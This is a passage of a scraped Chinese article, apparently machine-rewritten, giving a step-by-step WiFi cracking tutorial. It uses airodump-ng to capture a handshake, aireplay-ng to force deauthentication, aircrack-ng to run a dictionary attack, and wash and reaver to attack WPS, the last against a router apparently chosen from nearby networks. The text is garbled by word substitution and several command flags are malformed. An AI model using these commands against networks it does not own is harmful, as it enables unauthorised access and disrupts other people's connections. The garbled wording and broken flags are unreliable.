无线WiFi网络的密码破解攻防及原理详解

开启网卡监控

可以行使ifconfig呼吁查察一下网卡信息：

ifconfig 

可以看到网卡的名字已经变了

(3) 第三步

airodump-ng wlan0mon 

扫描wifi信号

这里我用本身家的wifi做尝试

(4) 第四步

上图可以看出

BSSID是50:3A:A0:33:B2:8C 信道(CH)是：2

输入：

airodump-ng -w freedom -c 2 -–bssid 50:3A:A0:33:B2:8C wlan0mon –ignore-negative-one 

抓去握手包

• -c：指定信道
• -w：指定抓去握手包的存放位置可能名字，freedom是一会抓去的握手包的名字
• --bssid：指定路由器的MAC

(5) 第五步

再开一个终端输入呼吁：

aireplay-ng – -deatu 10 -a 路由器MAC -c 客户机MAC  
wlan0mon – -ignore-negative-one 

行使airplay-ng器材逼迫断开已经毗连到wifi的装备从头毗连路由器，来举办抓去数据包

• –deatu：指定发送反认证包的个数，也可以行使-0(阿利伯数字0)来指定反认证包的个数
• -a：指定路由器的MAC
• -c：指定客户机的MAC

(6) 第六步

破解握手包

aircrack-ng -a -w dict freedom-*.cap 

• -a1：指定WEP加密方法
• -a2：指定WPA-PSk加密方法
• dict：字典的名字
• freedom-*.cap：握手包

这个就是我的wifi暗码

破解完成，乐成与否靠强盛的字典和命运了。

4. 第二种要领

(1) 第一步

Wash扫描开启WPS的收集

wash -i wlan0mon [-C] 

因为周围没有开启WPS成果的wifi，就会呈现上图那样，这时不要急，由于有些潜匿了起来，我们直接来。

用前面谁人扫wifi的呼吁：

airodump-ng wlan0mon 

望见小编圈起来的MAC没有，选择一个PWR的值的绝对值小于70的wifi破解

(2) 第二步

选择一个路由器

我在这选择的是名字为:FAST_F70E的wifi

就他了：E4:D3:32:7F:F7:0E -45 2 0 0 6 54e. WPA2 CCMP PSK FAST_F70E

然后呼吁如下:

reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv 

（编辑：湖南网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!